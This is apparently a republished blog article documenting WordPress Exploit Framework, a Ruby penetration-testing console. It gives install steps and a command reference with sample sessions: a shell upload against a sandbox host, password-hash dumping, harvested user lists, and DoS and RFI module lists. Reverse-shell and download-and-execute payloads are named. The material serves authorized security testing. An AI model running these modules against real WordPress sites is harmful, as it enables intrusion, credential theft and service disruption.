WordPress Exploit Framework - A Ruby Tool For Wordpress Penetration Testing
WordPress Exploit Framework is an open source framework that is designed to aid in the penetration testing of WordPress systems.
Requirements:
- Ruby >= 2.4.4
How To Install WordPress Exploit Framework
To install the latest stable build, run gem install wpxf .
After installation, you can launch the WordPress Exploit Framework console by running wpxf .
Debian Systems:
If you have issues installing WPXF's dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:sudo apt-get install build-essential patch
It's possible that you don't have important development header files installed on your system. Here's what you should do if you should find yourself in this situation:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
If you are experiencing errors that indicate that libcurl.dll could not be loaded, you will need to ensure the latest libcurl binary is included in your Ruby bin folder, or any other folder that is in your environment's PATH variable.
The latest version can be downloaded from curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as Win32 2000/XP zip 7.40.0 libcurl SSL . After downloading the archive, extract the contents of the bin directory into your Ruby bin directory (if prompted, don't overwrite any existing DLLs).
How To Use WordPress Exploit Framework
Start the WordPress Exploit Framework console by running wpxf .Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.
Loading a module into your environment will allow you to set options with the set command and view information about the module using info .
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/shell/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
Supported Commands:
- back
Changes the context of the session back to before loading the current module.
wpxf [exploit/shell/admin_shell_upload] > back
wpxf >
- check
Check if the currently loaded module can be used against the specified target.
wpxf [exploit/shell/admin_shell_upload] > check
[!] Target appears to be vulnerable
wpxf [exploit/shell/admin_shell_upload] >
- clear
Clear the screen.
- creds
List the credentials stored in the current workspace.
wpxf > creds
ID Host Username Password Type
-- --------------- -------- -------- -----
13 wordpress.vm:80 root toor plain
14 wordpress.vm:80 test plain
wpxf >
- creds -d [id]
Delete the credential with the matching [id] number.
wpxf > creds -d 8
[+] Deleted credential 8
wpxf >
- gset
Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wordpress.vm
[+] Globally set the value of host to wordpress.vm
wpxf > use exploit/shell/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>
wpxf [exploit/shell/admin_shell_upload] > show options
Module options:
Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
wpxf [exploit/shell/admin_shell_upload] >
- gunset
Unset a global option set with the gset command.
wpxf > gunset host
[+] Removed the global setting for host
wpxf >
- info
wpxf [exploit/shell/admin_shell_upload] > info
Name: Admin Shell Upload
Module: exploit/shell/admin_shell_upload
Disclosed: 2015-02-21
Provided by:
rastating
Module options:
Name Current Setting Required Description
---------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
password toor true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username root true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
Description:
This module will generate a plugin, pack the payload into it and upload it to
a server running WordPress; providing valid admin credentials are used.
wpxf [exploit/shell/admin_shell_upload] >
- loot
List the loot collected from targets in the current workspace.
wpxf > loot
ID Host Filename Notes Type
-- --------------- ----------------------- ------------------------------------- ---------
1 wordpress.vm:80 2018-07-14_15-00-56.csv Registered users and e-mail addresses user list
All filenames are relative to /home/rastating/.wpxf/loot
wpxf >
- loot -d [id]
Delete the loot item with the matching [id] number.
wpxf > loot -d 1
[+] Deleted item 1
wpxf >
- loot -p [id]
wpxf > loot -p 2
Email,Name
"lPBrOHC@mBeTjaAGGh.com","atgvrf"
"gSLzaYG@uZVUAeSJvj.com","dowzvc"
"AMfWgAH@uDNuULjBQv.com","efhkjv"
"halFIgH@CYqrzDzwQU.com","omquqt"
"root@wordpress.vm","root"
wpxf >
- quit
Exit the WordPress Exploit Framework prompt.
- rebuild_cache
Re-build the module cache.
wpxf > rebuild_cache
[!] Refreshing the module cache...
wpxf >
- run
Run the currently loaded module.
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run
[-] Determining database prefix...
[-] Dumping user hashes...
Username Hash
-------- -----------------------------------
root $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80
ATgVrF $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
DOWzVC $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB.
OmQUqt $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/
eFhkJv $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.
[+] Execution finished successfully
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >
- set
Set an option value for the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > set host wordpress.vm
[+] Set host => wordpress.vm
wpxf [exploit/shell/admin_shell_upload] >
- setg
Alias for gset.
- search
Search for modules that contain one or more of the specified keywords.
wpxf > search rfi
[+] 3 Results for "rfi"
Module Title
-------------------------------------------------- ----------------------------------------
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload
exploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Upload
wpxf >
- show advanced
Show the advanced options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show advanced
Name: basic_auth_creds
Current setting:
Required: false
Description: HTTP basic auth credentials (username:password)
Name: follow_http_redirection
Current setting: true
Required: true
Description: Automatically follow HTTP redirections
Name: max_http_concurrency
Current setting: 20
Required: true
Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200)
Name: proxy_auth_creds
Current setting:
Required: false
Description: Proxy server credentials (username:password)
Name: user_agent
Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6
Required: false
Description: The user agent string to send with all requests
Name: verify_host
Current setting: true
Required: true
Description: Enable host verification when using HTTPS
Name: wp_content_dir
Current setting: wp-content
Required: true
Description: The name of the wp-content directory.
wpxf [exploit/shell/admin_shell_upload] >
- show auxiliary
Show the list of available auxiliary modules.
wpxf > show auxiliary
[+] 58 Auxiliaries
Module Title
-------------------------------------- -----------------------------------------------------------
auxiliary/dos/load_scripts_dos WordPress "load-scripts.php" DoS
auxiliary/dos/long_password_dos Long Password DoS
auxiliary/dos/post_grid_file_deletion Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion
auxiliary/dos/wp_v4.7.2_csrf_dos WordPress 4.2-4.7.2 - CSRF DoS
...
wpxf >
- show exploits
Show the list of available exploits.
wpxf > show exploits
[+] 289 Exploits
Module Title
-------------------------------------------------------- --------------------------------------------
exploit/rfi/advanced_custom_fields_remote_file_inclusion Advanced Custom Fields Remote File Inclusion
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload
exploit/rfi/gwolle_guestbook_remote_file_inclusion Gwolle Guestbook Remote File Inclusion
exploit/rfi/wp_mobile_detector_rfi_shell_upload WP Mobile Detector RFI Shell Upload
...
wpxf >
- show options
Show the basic options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show options
Module options:
Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host wordpress.vm true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
wpxf [exploit/shell/admin_shell_upload] >
- unset
Unset an option set with the set command.
wpxf [exploit/shell/admin_shell_upload] > unset host
[+] Unset host
wpxf [exploit/shell/admin_shell_upload] >
- unsetg
Alias for gunset.
- use
Load the specified module into the current context.
wpxf > use exploit/shell/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>
wpxf [exploit/shell/admin_shell_upload] >
- workspace
wpxf > workspace
[-] default (active)
[-] test
wpxf >
- workspace [name]
Switch to the [name] workspace.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
wpxf > workspace test
[+] Switched to workspace: test
wpxf >
- workspace -a [name]
Add a new workspace.
wpxf > workspace -a wiki
[+] Added workspace: wiki
wpxf >
- workspace -d [name]
Delete the [name] workspace.
wpxf > workspace -d wiki
[+] Deleted workspace: wiki
wpxf >
Difference Between Auxiliary and Exploit Modules
Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
Available Payloads
- bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
- custom: uploads and executes a custom PHP script.
- download_exec: downloads and runs a remote executable file.
- meterpreter_bind_tcp: a Meterpreter bind TCP payload generated using msfvenom.
- meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated using msfvenom.
- exec: runs a shell command on the remote server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that will establish a reverse TCP shell.
Source: www.effecthacking.com
WordPress Exploit Framework - A Ruby Tool For Wordpress Penetration Testing
Reviewed by Anonymous
on
1:29 PM
Rating: